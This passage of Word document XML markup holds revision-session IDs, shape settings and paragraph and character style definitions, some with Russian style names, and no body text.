    <w:rsid w:val="00EB6373"/>
    <w:rsid w:val="00EB64E6"/>
    <w:rsid w:val="00EB76A9"/>
    <w:rsid w:val="00EB79CD"/>
    <w:rsid w:val="00EB7DAC"/>
    <w:rsid w:val="00EC0BB1"/>
    <w:rsid w:val="00EC17DD"/>
    <w:rsid w:val="00EC17F9"/>
    <w:rsid w:val="00EC23F4"/>
    <w:rsid w:val="00EC28D5"/>
    <w:rsid w:val="00EC3776"/>
    <w:rsid w:val="00EC5206"/>
    <w:rsid w:val="00EC6205"/>
    <w:rsid w:val="00ED0906"/>
    <w:rsid w:val="00ED0D6F"/>
    <w:rsid w:val="00ED0FE2"/>
    <w:rsid w:val="00ED1DCA"/>
    <w:rsid w:val="00ED31AC"/>
    <w:rsid w:val="00ED386F"/>
    <w:rsid w:val="00ED5498"/>
    <w:rsid w:val="00ED550C"/>
    <w:rsid w:val="00ED58BC"/>
    <w:rsid w:val="00ED68BE"/>
    <w:rsid w:val="00ED6FD6"/>
    <w:rsid w:val="00ED73BA"/>
    <w:rsid w:val="00ED772A"/>
    <w:rsid w:val="00ED7FB7"/>
    <w:rsid w:val="00EE0544"/>
    <w:rsid w:val="00EE0BA1"/>
    <w:rsid w:val="00EE1BDF"/>
    <w:rsid w:val="00EE2C88"/>
    <w:rsid w:val="00EE3D74"/>
    <w:rsid w:val="00EE4042"/>
    <w:rsid w:val="00EE42C8"/>
    <w:rsid w:val="00EE49D4"/>
    <w:rsid w:val="00EE61DA"/>
    <w:rsid w:val="00EE6578"/>
    <w:rsid w:val="00EE66B8"/>
    <w:rsid w:val="00EE77AB"/>
    <w:rsid w:val="00EE7935"/>
    <w:rsid w:val="00EE7C60"/>
    <w:rsid w:val="00EF1B50"/>
    <w:rsid w:val="00EF2A84"/>
    <w:rsid w:val="00EF32DA"/>
    <w:rsid w:val="00EF4224"/>
    <w:rsid w:val="00EF4686"/>
    <w:rsid w:val="00EF477F"/>
    <w:rsid w:val="00EF6B2F"/>
    <w:rsid w:val="00EF75EB"/>
    <w:rsid w:val="00F0011B"/>
    <w:rsid w:val="00F00493"/>
    <w:rsid w:val="00F0374F"/>
    <w:rsid w:val="00F03918"/>
    <w:rsid w:val="00F04980"/>
    <w:rsid w:val="00F05D1B"/>
    <w:rsid w:val="00F06070"/>
    <w:rsid w:val="00F072D8"/>
    <w:rsid w:val="00F07D3B"/>
    <w:rsid w:val="00F07F27"/>
    <w:rsid w:val="00F07F95"/>
    <w:rsid w:val="00F101AA"/>
    <w:rsid w:val="00F10839"/>
    <w:rsid w:val="00F10D11"/>
    <w:rsid w:val="00F114ED"/>
    <w:rsid w:val="00F115C8"/>
    <w:rsid w:val="00F12374"/>
    <w:rsid w:val="00F126D1"/>
    <w:rsid w:val="00F1356F"/>
    <w:rsid w:val="00F13A5A"/>
    <w:rsid w:val="00F13F9E"/>
    <w:rsid w:val="00F14562"/>
    <w:rsid w:val="00F149BC"/>
    <w:rsid w:val="00F15568"/>
    <w:rsid w:val="00F157F3"/>
    <w:rsid w:val="00F16A4D"/>
    <w:rsid w:val="00F17489"/>
    <w:rsid w:val="00F20E5F"/>
    <w:rsid w:val="00F23685"/>
    <w:rsid w:val="00F243AA"/>
    <w:rsid w:val="00F24EFB"/>
    <w:rsid w:val="00F25ADA"/>
    <w:rsid w:val="00F2698F"/>
    <w:rsid w:val="00F27232"/>
    <w:rsid w:val="00F272E0"/>
    <w:rsid w:val="00F3081C"/>
    <w:rsid w:val="00F30F9D"/>
    <w:rsid w:val="00F32A75"/>
    <w:rsid w:val="00F32D77"/>
    <w:rsid w:val="00F357FA"/>
    <w:rsid w:val="00F40D1D"/>
    <w:rsid w:val="00F42246"/>
    <w:rsid w:val="00F430A3"/>
    <w:rsid w:val="00F4316F"/>
    <w:rsid w:val="00F43B6A"/>
    <w:rsid w:val="00F43DA2"/>
    <w:rsid w:val="00F455D1"/>
    <w:rsid w:val="00F45DFF"/>
    <w:rsid w:val="00F46069"/>
    <w:rsid w:val="00F4639B"/>
    <w:rsid w:val="00F4687B"/>
    <w:rsid w:val="00F47FA6"/>
    <w:rsid w:val="00F505A4"/>
    <w:rsid w:val="00F53CD3"/>
    <w:rsid w:val="00F53E7C"/>
    <w:rsid w:val="00F54BA2"/>
    <w:rsid w:val="00F55596"/>
    <w:rsid w:val="00F55E8D"/>
    <w:rsid w:val="00F56072"/>
    <w:rsid w:val="00F56DDA"/>
    <w:rsid w:val="00F576D7"/>
    <w:rsid w:val="00F57C6E"/>
    <w:rsid w:val="00F608E7"/>
    <w:rsid w:val="00F60944"/>
    <w:rsid w:val="00F621EB"/>
    <w:rsid w:val="00F62546"/>
    <w:rsid w:val="00F6280D"/>
    <w:rsid w:val="00F635BA"/>
    <w:rsid w:val="00F63AE5"/>
    <w:rsid w:val="00F641D4"/>
    <w:rsid w:val="00F64275"/>
    <w:rsid w:val="00F645E3"/>
    <w:rsid w:val="00F64D89"/>
    <w:rsid w:val="00F65349"/>
    <w:rsid w:val="00F65C25"/>
    <w:rsid w:val="00F66620"/>
    <w:rsid w:val="00F67B84"/>
    <w:rsid w:val="00F71117"/>
    <w:rsid w:val="00F7259C"/>
    <w:rsid w:val="00F729F3"/>
    <w:rsid w:val="00F73358"/>
    <w:rsid w:val="00F735E9"/>
    <w:rsid w:val="00F738E6"/>
    <w:rsid w:val="00F757C6"/>
    <w:rsid w:val="00F75B98"/>
    <w:rsid w:val="00F76BD9"/>
    <w:rsid w:val="00F76D89"/>
    <w:rsid w:val="00F7716F"/>
    <w:rsid w:val="00F77521"/>
    <w:rsid w:val="00F81626"/>
    <w:rsid w:val="00F82296"/>
    <w:rsid w:val="00F87E42"/>
    <w:rsid w:val="00F909C3"/>
    <w:rsid w:val="00F90B2D"/>
    <w:rsid w:val="00F9131E"/>
    <w:rsid w:val="00F91D8D"/>
    <w:rsid w:val="00F92202"/>
    <w:rsid w:val="00F92C5B"/>
    <w:rsid w:val="00F9650A"/>
    <w:rsid w:val="00F97899"/>
    <w:rsid w:val="00FA06FC"/>
    <w:rsid w:val="00FA08E1"/>
    <w:rsid w:val="00FA268E"/>
    <w:rsid w:val="00FA330C"/>
    <w:rsid w:val="00FA5665"/>
    <w:rsid w:val="00FA5EE0"/>
    <w:rsid w:val="00FA7586"/>
    <w:rsid w:val="00FA772D"/>
    <w:rsid w:val="00FB3001"/>
    <w:rsid w:val="00FB3A28"/>
    <w:rsid w:val="00FB426C"/>
    <w:rsid w:val="00FB49A7"/>
    <w:rsid w:val="00FB635F"/>
    <w:rsid w:val="00FC0652"/>
    <w:rsid w:val="00FC23CC"/>
    <w:rsid w:val="00FC3274"/>
    <w:rsid w:val="00FC3868"/>
    <w:rsid w:val="00FC3D31"/>
    <w:rsid w:val="00FC4374"/>
    <w:rsid w:val="00FC5BBF"/>
    <w:rsid w:val="00FC60A3"/>
    <w:rsid w:val="00FC656C"/>
    <w:rsid w:val="00FC6789"/>
    <w:rsid w:val="00FC6DFC"/>
    <w:rsid w:val="00FC789F"/>
    <w:rsid w:val="00FD04A6"/>
    <w:rsid w:val="00FD0B15"/>
    <w:rsid w:val="00FD1466"/>
    <w:rsid w:val="00FD169E"/>
    <w:rsid w:val="00FD2C5A"/>
    <w:rsid w:val="00FD37A9"/>
    <w:rsid w:val="00FD3CFB"/>
    <w:rsid w:val="00FD6099"/>
    <w:rsid w:val="00FD6EFB"/>
    <w:rsid w:val="00FD735F"/>
    <w:rsid w:val="00FD73C8"/>
    <w:rsid w:val="00FD7FAB"/>
    <w:rsid w:val="00FE1AAF"/>
    <w:rsid w:val="00FE26EB"/>
    <w:rsid w:val="00FE27BE"/>
    <w:rsid w:val="00FE2ABD"/>
    <w:rsid w:val="00FE30E8"/>
    <w:rsid w:val="00FE38AB"/>
    <w:rsid w:val="00FE44CD"/>
    <w:rsid w:val="00FE4AA9"/>
    <w:rsid w:val="00FE6150"/>
    <w:rsid w:val="00FE647E"/>
    <w:rsid w:val="00FE76AE"/>
    <w:rsid w:val="00FF16F1"/>
    <w:rsid w:val="00FF1B39"/>
    <w:rsid w:val="00FF22A2"/>
    <w:rsid w:val="00FF348E"/>
    <w:rsid w:val="00FF440D"/>
    <w:rsid w:val="00FF485D"/>
    <w:rsid w:val="00FF4D0C"/>
    <w:rsid w:val="00FF50B4"/>
    <w:rsid w:val="00FF64C2"/>
    <w:rsid w:val="00FF73E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506">
      <o:colormenu v:ext="edit" strokecolor="none"/>
    </o:shapedefaults>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="1"/>
      <o:rules v:ext="edit">
        <o:r id="V:Rule1" type="callout" idref="#_x0000_s1050"/>
        <o:r id="V:Rule2" type="callout" idref="#_x0000_s1048"/>
        <o:r id="V:Rule3" type="callout" idref="#_x0000_s1047"/>
        <o:r id="V:Rule4" type="callout" idref="#_x0000_s1051"/>
        <o:r id="V:Rule5" type="callout" idref="#_x0000_s10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ind w:firstLine="56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DB3939"/>
    <w:pPr>
      <w:ind w:firstLine="709"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:link w:val="12"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00C75797"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0085694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2"/>
    <w:link w:val="30"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0085694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2"/>
    <w:next w:val="a2"/>
    <w:link w:val="40"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00ED090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2"/>
    <w:next w:val="a2"/>
    <w:link w:val="50"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00ED0906"/>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2"/>
    <w:next w:val="a2"/>
    <w:link w:val="60"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0065134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numbering" w:customStyle="1" w:styleId="Arial">
    <w:name w:val="Стиль маркированный Arial"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00B73EBF"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00856945"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="11"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00C75797"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00856945"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="280"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0091628F"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9639"/>
      </w:tabs>
      <w:ind w:right="140" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="23"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00856945"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a7">
    <w:name w:val="Основной текст Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00856945"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00856945"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00856945"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00856945"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00856945"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="003E7B0D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="note">
    <w:name w:val="note"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="003E7B0D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ct2">
    <w:name w:val="ct2"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="003E7B0D"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="imgcaptiontext">
    <w:name w:val="imgcaptiontext"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="003E7B0D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="header"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00086055"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ac">
    <w:name w:val="Верхний колонтитул Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="ab"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00086055"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="ae"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00086055"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ae">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="ad"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00086055"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003B1D52"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="120" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af0">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="af1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0021456A"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af1">
    <w:name w:val="Текст выноски Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="af0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0021456A"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="af2">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="005538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panlink">
    <w:name w:val="spanlink"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="005538AF"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="14">
    <w:name w:val="Стиль Заголовок 1 + По центру"/>
    <w:basedOn w:val="11"/>
    <w:rsid w:val="00C75797"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af3">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00CB6920"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="Заголовок 4 Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED0906"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="Заголовок 5 Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED0906"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="243F60" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="rtxt">
    <w:name w:val="rtxt"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00ED0906"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="keyword">
    <w:name w:val="keyword"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00ED0906"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="keyworddef">
    <w:name w:val="keyword_def"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00ED0906"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="texample">
    <w:name w:val="texample"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00ED0906"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="help-note-title">
    <w:name w:val="help-note-title"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00ED0906"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="main">
    <w:name w:val="main"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="00683BBB"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="zagol1">
    <w:name w:val="zagol1"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00683BBB"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="mainbolditalliccenter">
    <w:name w:val="mainbolditalliccenter"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="00683BBB"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Keyboard"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005346C8"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="Заголовок 6 Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00651344"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="243F60" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="lwcollapsibleareatitle">
    <w:name w:val="lw_collapsiblearea_title"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00651344"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="clsintro">
    <w:name w:val="clsintro"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="00FD04A6"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="clsnoindent">
    <w:name w:val="clsnoindent"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="00FD04A6"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="clssubhead">
    <w:name w:val="clssubhead"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00FD04A6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="clsgloss">
    <w:name w:val="clsgloss"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00FD04A6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="clsfigs">
    <w:name w:val="clsfigs"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00FD04A6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="clscap">
    <w:name w:val="clscap"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00FD04A6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="clscaptxt">
    <w:name w:val="clscaptxt"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00FD04A6"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML0">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="HTML1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FD04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rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTML1">
    <w:name w:val="Стандартный HTML Знак"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00FD04A6"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="31">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a2"/>
    <w:next w:val="a2"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FF22A2"/>
    <w:pPr>
      <w:spacing w:after="100"/>
